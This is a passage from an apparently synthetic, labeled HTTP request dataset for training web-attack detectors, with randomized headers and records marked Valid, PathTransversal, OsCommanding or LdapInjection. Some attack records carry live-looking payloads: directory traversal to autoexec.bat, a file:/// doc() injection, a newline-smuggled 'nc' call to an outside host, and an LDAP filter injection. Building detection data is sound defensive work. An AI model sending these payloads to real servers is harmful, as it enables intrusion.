Cookie: ehllpOlnliurue=havingls:enPjfch;yce=a;eosAapali=ih7Qh_C
Cookie2: $Version="081"
Date: Sun, 15 Nov 09 15:04:19 CET
ETag: "ATZ1OC@4L_0pKrDwRh"
Expect: t2erc=irB5;roAq2sbc
From: otyi@toidujaio.be
If-Modified-Since: Tue, 26 Jul 05 23:14:44 UTC
If-Unmodified-Since: Wed, 23 May 07 11:29:45 UTC
If-Match: "wQk3VeZanO4wfr9XKH7"
If-None-Match: *
If-Range: *
Max-Forwards: 26
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic bnVoc2JvOmVBcnlpaUNi
Range: 9-582047,9-,23678-00
Referer: /tnno/qSmrthi/sitn/elesr/qaltt.php
TE: gzip
Trailer: Referer
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 5.8; 0l-ft; rv:8.8.7) Gecko/90525479
UA-CPU: StrongARM
UA-Disp: 295,456,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4426x0282
Via: HTTP/6.1 www.mrsotrs.tiff
Transfer-Encoding: identity
Upgrade: wsepm/7.5, 5aaet/0.7, No5jm/7.8, gbfr/4.3
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 74768537554574
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23550
Start - Id: 239
class: Valid
GET /k3e9HGlYh-R3/eGPEhkVsxblXjNkk3u/rsoIktgjs1ai/91G8CKGa6DaQ4D4_kQ9s/90wl7/srGtistdsrnah1/9lFJX3/palc5otrNy3tn/@nodetfTX.php4?jh7N4T=tooelclsmocha&seC15ieawqRumw=h9ndIglhtaccesaL0RrNn&nttcieuLeetper=tJZO-&ca1J5=wrvbscript9je&YtT3B5aedifb=399442270&oehtkEdx=hoz1pioic HTTP/1.0
Host: 129.129.61.216:80
Connection: keep-alive
Accept: text/*, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.6, compress, gzip;q=0.0, deflate
Accept-Language: *
Cache-Control: 7lho='a6sob'
Client-ip: 211.247.217.165
Cookie: ioei9=iee;geigaOhpee=ish
Cookie2: $Version="87"
Date: Wed, 05 Jul 06 05:15:01 UTC
ETag: W/"X21PyK9s-3UqKPKb9XG"
Expect: eniti=caaIak;oledjTin
From: yeXhbouc@7trpphie.it
If-Modified-Since: Wed, 30 Aug 06 04:15:22 GMT
If-Unmodified-Since: Wed, 05 May 10 06:25:31 GMT
If-Match: *
If-None-Match: "MLY.yvJun_N.9RQY"
If-Range: "-cnb-e5CvsRNnzv"
Max-Forwards: 99
MIME-Version: 2.7
Pragma: T=kah
Proxy-Authorization: Basic dnNzYXltZDp3aHV4MGJndA==
Authorization: Digest response="7F650AfE5d0C4fAE3F6bDFDCC88f4E82"
Range: 99303-6
Referer: http://0ninm0.uk/adj4h/Uihi3/wwsE.jsp
TE: gzip;q=0.2,deflate,chunked
Trailer: Cache-Control
User-Agent: 5dt0gheoan (i2uqNxbX; a4h48I5Q; a3BE0.tD0; y9wI4Jy; hoVb1fLmxS)
UA-CPU: StrongARM
UA-Disp: 887,741,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 0.0 107.224.199.218, HTTP/0.7 64.162.187.92
Transfer-Encoding: identity
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 965 88.177.68.12 "4trBeattamo2onsSyh78" "Mon, 13 Nov 06 23:30:59 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 25177874898076816291
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 239
Start - Id: 45474
class: PathTransversal
GET /8w/mno/a3MwF4W0r/T1wra2aa/heTea/8cr.jpeg?27Bditetrc=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&ioaidtuvleyo=tri2&dk=07679546&rrA1er=%5Da%7Cx+a&uUzUxGIkvL@=9UeeS&anbeh=hKnEMg8W4%40&55h7=61135&systemCxmlt=E%27Aig HTTP/1.1
Host: www.feanete.it
Connection: rhtne
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.8, big5;q=0.4, windows-1253;q=0.6, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: hAsr-sfdii, fg-vtmksr;q=0.8, os-kSg7lae, lfzpnH-0aaxx, oa-iyhget
Cache-Control: no-transform
Client-ip: 172.157.36.227
Cookie: ue=dTt8wk
Cookie2: $Version="01"
Date: Wed, 31 Dec 08 10:06:16 CET
ETag: W/"CKh9OZb7b5y0wL6Mj"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sun, 31 Dec 06 20:05:24 GMT
If-Unmodified-Since: Sat, 18 Oct 08 06:54:53 GMT
If-Match: "IF0MoCAR@dw@D2VDn92"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: Wed, 03 Aug 05 07:48:56 UTC
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest username="hesa"
Authorization: Digest uri=http://www.toaM.com/8seoind/stty/aewnmO.conf
Range: 934-,6-,-7
Referer: http://www.eld6si.org/eocneltc/bn9anom/g5e2h/revrnhn0.ace
TE: trailers,gzip;q=0.2
Trailer: Referer
User-Agent: Mozilla/8.7 (X11; U; Solaris 6.0; er-lu; rv:9.5.6) Gecko/30088741
UA-CPU: x86
UA-Disp: 1452,073,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: FTP/7.5 11.170.76.113, FTP/5.1 www.gluesb.html:83591, tteX/2.1 www.ednikhy.tiff:3
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45474
Start - Id: 24551
class: Valid
GET /jL/DBselectNceAR8hGV/I1%uetc@Z/r7scezt1eat.sh?lt=oLGbjV3L9&terrrtmecTee6=tG&hzw3hoj91idnsrf=c HTTP/1.1
Host: www.stduseYhp.ch
Connection: close
Accept: application/postscript, audio/x-wav, application/zip;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: c1apq-n;q=0.0, hiheyt-iogm3d, ee2-ea, 5p-r;q=0.0, rc-wxnetne;q=0.4
Cache-Control: only-if-cached
Client-ip: 214.196.246.18
Cookie: hfnn=22;roi=265166
Cookie2: $Version="50"
Date: Wed, 16 Feb 05 17:37:30 UTC
ETag: "YB2LKGSxc6yUsvNNr-M"
Expect: 100-continue
From: 1ulNhsn@sSweeqd.gov
If-Modified-Since: Thu, 07 Oct 04 06:23:55 CET
If-Unmodified-Since: Fri, 18 Nov 05 06:03:16 UTC
If-Match: "CW7BTbJyjJxmgBfSE"
If-None-Match: *
If-Range: Thu, 02 Jul 09 18:07:01 GMT
Max-Forwards: 864
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: oyTb n3auus1d=esdje3nn
Authorization: NTLM MW9lcnJ0ZWxIaWtlYXZkd3NpM0V3dXQ3c2VhMm9lZmpuY2JC
Range: 8-,-762016
Referer: /sNoaao/ocetT.pl
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.9 (X11; U; Linux i386 6.3; Ep-mw; rv:4.9.2) Gecko/20785067
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: FTP/2.5 www.M0doamy.js
Transfer-Encoding: Nd3p
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 405 14.155.225.104 "dmEhElfKoS" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24551
Start - Id: 29262
class: Valid
GET /d1a/ijsssiiMRaldin8hdeas/ijgfnhbta/ej-q/system9xgo1L.between6bostdinLw/@vWDVgq065KE5Bx/2swwsoE/SnietaOm9esjrneoh.jpg?eeoeifeaf=xcanoq&DX_t=97e5&bT3ctmr=bins2mihag&euennee=8264&zhFboo6sisgse=%3FSolE&3ehwsi9laeipz=rnI%7CI HTTP/1.1
Host: 139.76.42.30:80
Connection: close
Accept: text/*, image/png;q=0.3
Accept-Charset: shift_jis;q=0.3, x-mac-chinesetrad;q=0.7, isiri-3342, iso-2022-jp, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=11
Client-ip: 52.236.75.153
Cookie: FFvVGAnCAnode=668;eibmmyOtRbelf=winntqst8Hthtdeletenetcattnodenz ae;rneid=rDF;L0ahpwF_=033;mp3synodoset=6192
Cookie2: $Version="697"
Date: Wed, 11 Feb 09 10:28:01 UTC
ETag: W/"PBQsQmQZlKxLVko"
Expect: Stu6fO
From: vksFfwla@1brae8.com
If-Modified-Since: Mon, 09 Jun 08 16:29:49 CET
If-Unmodified-Since: Tue, 16 Mar 10 21:02:39 UTC
If-Match: *
If-None-Match: "Cz1aS69_h3seOuPurQ7i"
If-Range: Sat, 15 May 04 22:44:42 CET
Max-Forwards: 23
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM ZUkxZXlvcnNhbjhhcmVpYTNsbGhhMWZsb3NodjVmZjRyYXY3
Authorization: Digest response="1b2DB27CCF9dE6E6F44d8e6a8EEDF329"
Range: 573445-27087,-40251
Referer: /z9as2/5fiwb/dDnuiEbu/tlrehc1e.cgi
TE: gzip;q=0.5,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.6 (compatible; Konqueror/4.1; Open BSD i386; lteuhxe2)
UA-CPU: PowerPC
UA-Disp: 755,529,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: FTP/0.0 55.123.119.35:94685
Transfer-Encoding: identity
Upgrade: syagel/7.4, wae/1.3
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 110.4.41.253
X-Serial-Number: 4249614312362158832
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29262
Start - Id: 43281
class: OsCommanding
GET /dD.jsp?h5r=%250a++++nc++++www.tona.com+++++80+++++%3B&DWZe=9agitrv1iu9dt HTTP/1.1
Host: 1.19.95.222:3161
Connection: 4reaws
Accept: text/*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: n-r3s, c-e, eduhitbt-ixs, Soaj0x-rencog
Cache-Control: ng=ico95H
Client-ip: 86.210.157.25
Cookie: etrC=932359268;xroed=429;ge1o=7eo?likefNshtpassoe g
Cookie2: $Version="414"
Date: Sat, 10 Oct 09 10:02:22 UTC
ETag: "uw0F93ddPpx2gjr8"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 15 Jun 08 02:35:55 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: "LlYqESggmMdvozlOuT"
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 8
MIME-Version: 3.7
Pragma: eeic='a'
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: http://bsaZ.gov/otWt5ho.swf
TE: gzip;q=0.7
Trailer: If-None-Match
User-Agent: aSaiexit1 (eB@gm3y; wuUIbYKEPg; dXR3S5P; pnd05I; iFH-rw)
UA-CPU: PowerPC
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/6.3 www.dieisci.html:60071, 3.2 119.193.47.207, HTTP/6.1 165.174.250.125
Transfer-Encoding: identity
Upgrade: apais/4.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43281
Start - Id: 1831
class: Valid
GET /di@XMPX9il2h/lcsre9/zvINMJT6eqm9J1C8U/eosints7wtx/gtngbneHAswi/Kqd_UF9/ettttearRlskrlpacfi/IiySioereeun8jb/uS/ESdaxct/IUplib/9hyaA35aSt.shtml?tmSeatclthaXh=resnc5nlEasr&iilbnihcdaEo=y4nnei89isDttnhbev HTTP/1.1
Host: www.bpoc.de:8971
Connection: esesDo8e
Accept: image/*, application/*, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: cAevonto='5bh'
Client-ip: 211.115.143.28
Cookie: 3at=7oaSlHriaq;TVs=nttaUdr;nwsm7n=iCeYelhecd;qee=osesilrisoas3ze;JquvwKOshttpdG1=80243640;phib0utc=A9sssam
Cookie2: $Version="8"
Date: Sun, 10 Jan 10 22:18:49 UTC
ETag: W/"o2dpEeATld.pcg2"
Expect: asReiisa=mLvton2a
From: etiimsr@2ilc8.de
If-Modified-Since: Wed, 28 May 08 10:50:15 GMT
If-Unmodified-Since: Thu, 14 Jan 10 13:01:43 GMT
If-Match: *
If-None-Match: "g09ckzPwhLUyF@SB6"
If-Range: "8DTy-_5229-W8pexUo"
Max-Forwards: 56
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM cnpvZmg1bnRzYWc4aG5jYm9ucnR0bWdjY2g4b3pqa29yMURTcGVyZW1k
Authorization: Basic YW9iZWk6YWVlZUR0
Range: -1402,47341-
Referer: /aGEe.swf
TE: gzip
Trailer: Warning
User-Agent: ie8yne8edieeiahmlneO
UA-CPU: x86
UA-Disp: 0564,279,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 289x684
Via: FTP/3.6 www.na5y.html
Transfer-Encoding: gzip
Upgrade: mntn/9.1, 8tme/6.2, rRoA/2.8, jle/4.8
Warning: 357 113.83.13.183 "t0renlokMi9" 
X-Forwarded-For: 22.125.3.165
X-Serial-Number: 0392549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1831
Start - Id: 44735
class: PathTransversal
GET /elQ_ino7vQTD@OmzHl/AK9eobtbhDdkdptaano/5oo0Ee/9e9H4.dll?uacouJRtno=rdagbtCdAp&tohiWTiI=Nsmrpiouniono&nj2etTtlSamryE=i7&lpT=66&2_agL2P0ah=m8kfromh+mi%3Eh%27&haetTom=0972488&wiieAEuo=7b-X2s&etitcrel=i4q&dsenrrex=psee&no3ttb=tecahb6&RReocrtbA4yotar=doc%28+file%3A%2F%2F%2Fc%3A%2Ftmse%2FeEyn.xml+%29 HTTP/1.0
Host: 179.81.231.40
Connection: xjntOmsi
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: ese5-9ragi, 8nHhtelq-qstbu;q=0.1
Cache-Control: no-store
Client-ip: 237.182.46.186
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="66"
Date: Fri, 16 Apr 04 20:26:55 GMT
ETag: W/"zA.aoV@g1KTOsZ7."
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Sun, 11 Feb 07 22:23:30 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 31 Dec 09 22:31:17 CET
Max-Forwards: 743
Pragma: aodh8tp=gtgsarh
Authorization: NTLM bmhHcHhlaWo5b3JkbHVzZmZ5dG53c2VySnNiZXVlb0V0bnJjc2c=
Range: 218-,38304-
Referer: http://www.abaa5.fr/Idae9Ct/imiHI/ktthcn/laura9/rUyhHa.tar
Trailer: TE
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 7.6; uR-en; rv:6.8.0) Gecko/36296036
UA-CPU: MIPS
UA-OS: Windows 98
UA-Color: color8
Via: FTP/0.1 www.odlMt.js, FTP/2.4 108.109.61.74, HTTP/0.6 5.58.30.194
Transfer-Encoding: identity
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44735
Start - Id: 14338
class: Valid
GET /ean1/396viFY65X/lNQ7olHpefvGbkA6/gN/passwdqDallfGcX_KPG6Ll/mTdidm1wkw.msf? HTTP/1.1
Host: 3.131.104.173:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: gahsr-4zmxpeo;q=0.8, v-iiae0;q=0.8, 2Avis-eissa1ae;q=0.7
Cache-Control: max-stale=444
Client-ip: 231.15.172.193
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="48"
Date: Sun, 23 Dec 07 06:55:01 CET
ETag: W/"WxFpJ8ctmwuCHKC"
Expect: 100-continue
From: nscEel@itiaa.net
If-Modified-Since: Fri, 25 Dec 09 23:44:41 UTC
If-Unmodified-Since: Sun, 20 Nov 05 02:46:52 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Feb 10 14:00:41 GMT
Max-Forwards: 8
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM NHRva29lbWNxcENmNEh0dExiTnNIdGg5bnVycnVhZXMxbHRkZQ==
Authorization: Basic cDRBYWg6eXJvaWU=
Range: 938-
Referer: /gEYpd/bndquh/np1e/8amn.tar
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/6.6 (compatible; MSIE 2.1; WinNT; 9amn; ueEhephrs)
UA-CPU: StrongARM
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: tgh/9.6 230.155.88.219, HTTP/7.8 www.nterPsAo.jpg, 5.6 www.e9uazy.js
Transfer-Encoding: compress
Upgrade: 9sii2/1.4
Warning: 869 www.s98uEo.css "er1dzcr" 
X-Forwarded-For: 86.196.76.2
X-Serial-Number: 202713931770679449
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14338
Start - Id: 3083
class: Valid
GET /etlrzPc-pfY/777tamG5lobltRbeni/egofx0Glswdu4/enPf8d.mZ0MJd/nw/fO8OjGBg/qiQNUplnKTtz/nc.php? HTTP/1.1
Host: www.amvnmfhhnl.net:80
Connection: Toai
Accept: video/quicktime;q=0.9, text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: 2hye-nsdhrej, tOcii-odc5a;q=0.9
Cache-Control: no-cache
Client-ip: 108.17.208.166
Cookie: bteuAHtnteeetU8=i0A;dIew82imnvcsf=sNW;ddegrs19eitn=window.openftpc;ramiooeis8ni=330393;htlolsRtdrmi=676
Cookie2: $Version="512"
Date: Sun, 24 Oct 04 06:19:57 CET
ETag: W/"pHHw6kd37mK.3z6g"
Expect: 100-continue
From: ssmefI@deee3y.biz
If-Modified-Since: Sat, 20 Dec 08 22:03:33 GMT
If-Unmodified-Since: Mon, 19 Apr 10 10:59:57 UTC
If-Match: "ztsve@0nW1vnsYgpawG"
If-None-Match: *
If-Range: "dRT4_rj-5CWc@pOP"
Max-Forwards: 5940
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="endc"
Authorization: a6ron oaxoU=edH5e
Range: 23-20512,7-,-616668
Referer: http://enRomT.net/dp6rga9e/toiomwta.conf
TE: gzip,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 8.7; rg-an; rv:4.9.2) Gecko/77001479
UA-CPU: StrongARM
UA-Disp: 3610,5724,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: caao/7.8 www.dnw2Dm.html
Transfer-Encoding: identity
Upgrade: ket/3.8, j3t/3.2
Warning: 361 101.25.41.103 "npcnnernr1ihee0t" "Sun, 02 Aug 09 11:35:21 GMT"
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 1257275939567339049
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3083
Start - Id: 10445
class: Valid
GET /N3i/aOronAC-32l7yOkIgglD/5ugonsnlenoraoA0/dyc/saccPmmpCSLVCDtal/odiyjqz6y.cgi?EaAubPnlyE=qeo1gec+Lr&lR=aIRjeIV.nSIa&iregeHeheaesoa=o3n6s2leteIscript HTTP/1.0
Host: www.9imoeari.net:80
Connection: keep-alive
Accept: video/*;q=0.5, application/rtf
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: eaeor-hE;q=0.4, e-wkaItoo;q=0.5, oiihtm-t9c7sihz;q=0.3
Cache-Control: hdd='Ma2Trgym'
Client-ip: 240.84.16.107
Cookie: tcgf4lxnih9wft=b;tfnsCkyc=cmQjPdRy;3tr= aaeS;aSitu=7341929843;eyph=66061506
Cookie2: $Version="2"
Date: Sun, 29 Feb 04 16:44:06 UTC
ETag: "fsBmF8UWeNsjxxd8"
Expect: 100-continue
From: ibieNid@J8oa.be
If-Modified-Since: Mon, 05 Mar 07 02:03:02 GMT
If-Unmodified-Since: Sun, 22 Apr 07 10:59:34 CET
If-Match: *
If-None-Match: "cHChKo1jS49w2OJKdVJT"
If-Range: "A-1QzkpmdTFkiUIW7"
Max-Forwards: 22
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YW9oS2g6Z1RyMzk=
Range: 5-355295,61313-1,05930-37268
Referer: /9ftd4l/atlelam/efi4q.pl
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: rkba (sEB08vtY3F; vGu5rs)
UA-CPU: StrongARM
UA-Disp: 708,099,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7227x6591
Via: hrIihi/5.2 67.114.213.184
Transfer-Encoding: deflate
Upgrade: ahNu/7.3
Warning: 652 111.250.70.162 "brmtjNlisrMelgny" 
X-Forwarded-For: 165.149.230.245
X-Serial-Number: 565897995851
----: --------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10445
Start - Id: 10473
class: Valid
GET /i36ldhiomeylhi/xG/RlikezfcbSPYEj2Hh/dyhu0Ngm5d/eR8/iBlqhyjza2vTKBzZszN0/iYF7WllBE31r3Ut@d.aspx?hdceeo72a=0os-th%3Cjt%27rxd%3C&aCvsl9Tgr=986971178&7c=re+&owj5kiaiane=egroup+byer&Havphtbi9haof8=bdd+&axtnqsEsit=632&tdRIrfe8=nBtne%3Eo+anulls&zio=ev1pa&nttrgdEtsmaByh=6814&c4apYg=ogmoliedscopyTe&py8asDmlrTrl=5%40 HTTP/1.0
Host: 5.246.158.13
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: ndtamt=ieiu
Client-ip: 234.79.172.175
Cookie: zkwennLnsz6emeu=074543
Cookie2: $Version="93"
Date: Fri, 22 Dec 06 17:07:52 GMT
ETag: "l4MqmcenoI2jHZrUVD9s"
Expect: eeetY
From: cnaRah@eehb.be
If-Modified-Since: Wed, 19 Dec 07 11:48:05 CET
If-Unmodified-Since: Mon, 14 Nov 05 14:05:32 CET
If-Match: "VJy1HWINkuJoJeTfyBy"
If-None-Match: "PZme4TJzmkevuBpExfb"
If-Range: *
Max-Forwards: 8962
MIME-Version: 2.6
Pragma: ps='1iiEf'
Proxy-Authorization: ahrg eanceorA=Hkshco8
Authorization: NTLM c3QyUmVpYXNpaGVGanNzZDhyOGVBaWZpZUVodGUyeW5hY0F0b2VycmxJc3Rwb2U=
Range: 5-1,96994-671,51284-
Referer: /ddaS7il/ayoek/ynolewt/txair.asp
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: vedi/6.5.3.9.5
UA-CPU: StrongARM
UA-Disp: 4955,848,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 747x1672
Via: 8.1 www.7nmcvXph.png
Transfer-Encoding: deflate
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 236 www.oadmow.htm "dwuNt7" "Fri, 01 May 09 20:56:35 UTC"
X-Forwarded-For: 153.53.63.108
X-Serial-Number: 23963701086419023023
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10473
Start - Id: 16596
class: Valid
GET /HU9Recho-47Bk/ousyob/KX/Wvu9/rAap1relUo/o0-lzbMg_2ANh/qoeh4et7d/mB@lupdateKWwVVS.sh?syNcomatsu=674901&IscriptKhRt=7&-rrS=1825 HTTP/1.1
Host: 95.150.111.171
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=332
Client-ip: 123.15.158.150
Cookie: oih6i6ea6=591446349;ytsYmdr=anYlSJ;FzN4objectPrxdroptelnetD=dFU-Vr
Cookie2: $Version="43"
Date: Tue, 19 Apr 05 20:50:45 GMT
ETag: "MX6JygOzoRFse2K7NF7"
Expect: lenu=baie;r4Re1
From: bloE0mq@0Tsa2yccis.de
If-Modified-Since: Wed, 25 Nov 09 10:08:55 UTC
If-Unmodified-Since: Thu, 19 Feb 04 10:59:24 UTC
If-Match: "Q5exn4u11wyORf@cA6"
If-None-Match: *
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 2100
MIME-Version: 6.1
Pragma: bse=ux0no
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: at9oed 7olBr=b8sn
Range: -508053,86460-25,-68
Referer: http://www.hojoi.cz/lishnend/v1seh.asmx
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/9.0 (X11; U; Unix 6.6; h0-s0; rv:0.2.5) Gecko/55893785
UA-CPU: x86
UA-Disp: 1704,0727,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1536x5641
Via: HTTP/3.0 210.151.132.77:7046
Transfer-Encoding: gzip
Upgrade: elllth/8.1, tsut8/2.1, egdusr/1.6
Warning: 302 www.iatetm.shtml "Tetamelsqnttnkl0otnA" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16596
Start - Id: 23571
class: Valid
GET /ve2ea9sh4Ethtn/rLzy.7IRo8yhkqVZ/vP@T/5cncnBlr9hxAow0ds4yn/4kp7qTmPOVhttpsfselectoW/ePoUnwtld9yXjR1/oSbsyCt.shtml? HTTP/1.1
Host: www.p3f6ur2f0.it
Connection: 7teta
Accept: */*;q=0.4
Accept-Charset: shift_jis;q=0.2, windows-1252, gb2312;q=0.0, euc-jp
Accept-Encoding: 
Accept-Language: sLd-ohne, y-8r;q=0.9, gbniSlNa-eij6, kdy-m3jafeon;q=0.7
Cache-Control: max-age=4
Client-ip: 231.131.37.145
Cookie: Eo2gsto=aXNTj;r1aaemxh=78;2eatsm=rrshagkteahr7drOkt;04sup=bhtswn;binuGweaccepto.=n&i];ord5uo7ne=hebopnsaspaqnn2e
Cookie2: $Version="413"
Date: Mon, 10 Jul 06 05:14:01 UTC
ETag: W/"76AOSxX6YMQ3_rxowZ0"
Expect: eshv0r=Szdgedt;uOhaha9n
From: caat@loSde.net
If-Modified-Since: Mon, 10 Sep 07 14:55:43 CET
If-Unmodified-Since: Tue, 04 Jan 05 24:42:46 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Oct 07 24:15:44 CET
Max-Forwards: 4113
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic eWk4MGNlOnRnb3c=
Range: 62145-4,-94,41-
Referer: /I5nmirnU.php4
TE: trailers
Trailer: If-Match
User-Agent: sys7l2S
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4426x0282
Via: 8.4 www.deethjhu.css, osetNa/0.9 237.190.198.212
Transfer-Encoding: compress
Upgrade: yhlh/5.7, nern/8.3
Warning: 241 172.17.37.245 "tearnDtre" "Tue, 03 Jun 08 05:53:19 CET"
X-Forwarded-For: 73.5.140.170
X-Serial-Number: 1009110184973666911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23571
Start - Id: 38375
class: LdapInjection
GET /hOl0HPeK7g-67/hl0rmhps/mshe6aortPhECr4/oiReQIXebfu@HESYsNZx/fq7XdU.htm?c4Eaa8f8t3c=Vperltiframeww4lpsr9yoo4iancj&i8R5h=mTp6at1UTxboh&6qsyLiry2ee5=+9snwnpirenetcatn&OPgeN=nph-eqbgsound%3Byimg%3A%27moe8hYi&rrWC4da=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.rmtsbAgle.com
Connection: keep-alive
Accept: text/*;q=0.8, text/*;q=0.7
Accept-Charset: iso-2022-jp;q=0.5, x-mac-chinesetrad;q=0.9, x-mac-hebrew;q=0.8, x-mac-ce, iso-8859-4
Accept-Encoding: 
